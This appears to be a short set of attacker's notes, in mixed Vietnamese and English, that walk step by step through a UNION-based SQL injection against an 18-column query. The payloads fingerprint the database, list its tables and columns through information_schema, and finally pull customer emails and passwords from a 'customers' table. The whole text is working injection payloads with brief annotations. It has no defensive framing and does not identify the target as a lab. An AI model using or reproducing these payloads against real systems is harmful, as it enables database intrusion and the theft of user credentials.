'   (test) 

' or 1=1 -- -( show dữ liệu full bảng) 

' ORDER BY 18 -- -   (XÁC định số cột )

' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 -- -  ( display column 6, so can exploit) 


' UNION SELECT 1,2,3,4,5,database(),7,8,9,10,11,12,13,14,15,16,17,18 -- - ( check name db) 

%' UNION SELECT 1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.tables-- - ( it will show all table) 

%' UNION SELECT 1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.tables where table_name like 'customer%' -- - ( show 2tables user) 
customers, customer_orders

%' UNION SELECT 1,2,3,4,5,concat(table_name,0x0a,column_name),7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.columns where table_name = 'customers' -- - ( show columns in table ) 

%' UNION SELECT 1,2,3,4,5,concat(customer_email,0x0a,customer_pass),7,8,9,10,11,12,13,14,15,16,17,18 from customers -- - ( show email and password ) 
